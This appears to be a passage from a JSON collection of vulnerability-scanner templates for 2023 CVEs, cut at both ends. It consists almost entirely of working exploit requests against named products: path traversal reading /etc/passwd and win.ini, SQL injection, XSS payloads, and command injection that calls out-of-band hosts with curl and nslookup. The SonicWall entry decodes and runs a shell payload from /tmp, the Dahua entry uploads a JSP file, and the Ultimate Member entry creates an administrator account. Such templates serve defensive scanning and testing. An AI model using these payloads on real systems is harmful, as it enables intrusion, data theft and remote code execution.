*/*\n\ngroup%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","POST /groups HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\ngroup%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}\n","@timeout: 15s\nPOST /projects HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nproject%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}\n","POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nX-CSRF-Token: {{x-csrf-token}}\nContent-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6\n\n--0ce2a9fbe06b6da89c138a35a1765ed6\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}\"\n\n{{randstr}}\n--0ce2a9fbe06b6da89c138a35a1765ed6--\n","GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","words":["726f6f743a78"],"encoding":"hex"},{"type":"word","part":"header","words":["application/octet-stream","etc%2Fpasswd"],"condition":"and"}],"extractors":[{"type":"regex","name":"token_1","group":1,"regex":["name=\"authenticity_token\" value=\"([A-Za-z0-9_-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"token_2","group":1,"regex":["name=\"csrf\\-token\" content=\"([A-Z_0-9a-z-]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"parent_id","group":1,"regex":["href=\"\\/groups\\/new\\?parent_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"namespace_id","group":1,"regex":["ref=\"\\/projects\\/new\\?namespace_id=([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"x-csrf-token","group":1,"regex":["const headers = \\{\"X\\-CSRF\\-Token\":\"([a-zA-Z-0-9_]+)\""],"internal":true,"part":"body"},{"type":"regex","name":"upload-hash","group":1,"regex":["\"url\":\"\\/uploads\\/([0-9a-z]+)\\/"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-26067","info":{"name":"Lexmark Printers - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Length: 49\n\nFT_Custom_lbtrace=$({{cmd}})\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'dns')","contains(body, 'Fax Trace Settings')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-23491","info":{"name":"Quick Event Manager < 9.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"qem_calendar\")"],"condition":"and"}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29622","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test&password=test')+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+('orQN'='orQN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\")"],"condition":"and"}]}]},{"id":"CVE-2023-38035","info":{"name":"Ivanti Sentry - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /mics/services/MICSLogService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'isRunningTzz')","contains(interactsh_protocol, 'dns')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-34124","info":{"name":"SonicWall GMS and Analytics Web Services - Shell Injection","severity":"critical"},"requests":[{"raw":["GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1\nHost: {{Hostname}}\nAuth: {\"user\": \"system\", \"hash\": \"{{base64(hex_decode(auth))}}\"}\n","GET /appliance/login HTTP/1.1\nHost: {{Hostname}}\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,\"^.*:\",\"\"))) }}&password={{replace_regex(alias,\"^.*:\",\"\")}}&applianceUser={{replace_regex(alias,\":.*$\",\"\")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnum=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\\$\\(echo\\+-e\\+begin-base64\\+755\\+a\\\\\\\\nKwee\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+\\|\\+uudecode\\+-o-\\)\\%3becho\\+-e\\+begin-base64\\+755\\+/tmp/.{{filename}}\\\\\\\\n{{replace(base64(callback),\"+\",\"${PLUS}\")}}\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<title>SonicWall Universal Management Appliance</title>","<title>SonicWall Universal Management Host</title>"],"condition":"or"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"alias","group":1,"json":[".alias"]},{"type":"regex","part":"body","internal":true,"name":"servertoken","group":1,"regex":["getPwdHash.*,'([0-9]+)'"]}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert`document_domain`</script>\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36346","info":{"name":"POS Codekop v2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.location)</script>","<title>print</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1730","info":{"name":"SupportCandy < 3.1.5 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"supportcandy\")"],"condition":"and"}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>Processing...</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39026","info":{"name":"FileMage Gateway - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,'bit app support','extensions','fonts')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27372","info":{"name":"SPIP - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\n","POST /spip.php?page=spip_pass HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=spip_pass&formulaire_action=oubli&formulaire_action_args={{csrf}}&oubli=s:19:\"<?php phpinfo(); ?>\";\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name='formulaire_action_args'[^>]*value='([^']*)'"],"internal":true,"part":"body_1"},{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body_2"}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29300","info":{"name":"Adobe ColdFusion - Pre-Auth Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(body, \"ColdFusion documentation\")"],"condition":"and"}]}]},{"id":"CVE-2023-36287","info":{"name":"Webkul QloApps 1.6.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncontroller=change-currency9405'-alert(document.domain)-'&id_currency=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'change-currency9405'-alert(document.domain)-'';","customizationIdMessage"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27350","info":{"name":"PaperCut - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /app?service=page/SetupCompleted HTTP/1.1\nHost: {{Hostname}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FSetupCompleted%2F%24Form&sp=S0&Form0=%24Hidden%2CanalyticsEnabled%2C%24Submit&%24Hidden=true&%24Submit=Login\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print-and-device.script.enabled&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=Y&%24Submit=Update\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2FquickFindForm&sp=S0&Form0=%24TextField%2CdoQuickFind%2Cclear&%24TextField=print.script.sandboxed&doQuickFind=Go\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FConfigEditor%2F%24Form&sp=S1&Form1=%24TextField%240%2C%24Submit%2C%24Submit%240&%24TextField%240=N&%24Submit=Update\n","GET /app?service=page/PrinterList HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=page%2FPrinterList\n","POST /app?service=direct/1/PrinterList/selectPrinter&sp={{printerID}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterList%2FselectPrinter&sp={{printerID}}\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2FprinterOptionsTab.tab&sp=4\n","POST /app HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nservice=direct%2F1%2FPrinterDetails%2F%24PrinterDetailsScript.%24Form&sp=S0&Form0=printerId%2CenablePrintScript%2CscriptBody%2C%24Submit%2C%24Submit%240%2C%24Submit%241&printerId={{printerID}}&enablePrintScript=on&scriptBody=function+printJobHook%28inputs%2C+actions%29+%7B%7D%0D%0Ajava.lang.Runtime.getRuntime%28%29.exec%28%27{{cmd}}%27%29%3B&%24Submit%241=Apply\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Avanceret kontering"]}],"extractors":[{"type":"regex","name":"printerID","group":1,"regex":["erList\\/selectPrinterCost&amp;sp=([a-z0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2732","info":{"name":"MStore API <= 3.9.2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wp-json/wp/v2/add-listing?id=1 HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["email-description","Username"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0563","info":{"name":"Bank Locker Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-locker-details.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/><script>alert(document.domain)</script>\")","contains(body, \"Bank Locker Management System\")"],"condition":"and"}]}]},{"id":"CVE-2023-34192","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=preferred\n","GET /h/autoSaveDraft?draftid=aaaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cbbbbbbbb HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>","zimbra"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","part":"header_2","status":[200]}]}]},{"id":"CVE-2023-20888","info":{"name":"VMware Aria Operations for Networks - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/events/push-notifications HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: application/json\n\n{\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23333","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nGET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["33332-3202-EVC"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27034","info":{"name":"Blind SQL injection vulnerability in Jms Blog","severity":"critical"},"requests":[{"raw":["@timeout: 12s\nPOST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\nHost: {{Hostname}}\nConnection: Keep-alive\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"comment\"\n\n555\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"customer_name\"\n\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email\"\n\n0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"post_id_comment_reply\"\n\n1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"submitComment\"\n\nsubmitComment=\n------------YWJkMTQzNDcw--\n","GET /modules/jmsblog/config.xml HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_1>=6","contains(body_2, \"Jms Blog\")"],"condition":"and"}]}]},{"id":"CVE-2023-26256","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["$textMime"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2023-39598","info":{"name":"IceWarp Email Client - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","icewarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34960","info":{"name":"Chamilo Command Injection","severity":"critical"},"requests":[{"raw":["POST /main/webservices/additional_webservices.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{RootURL}}\" 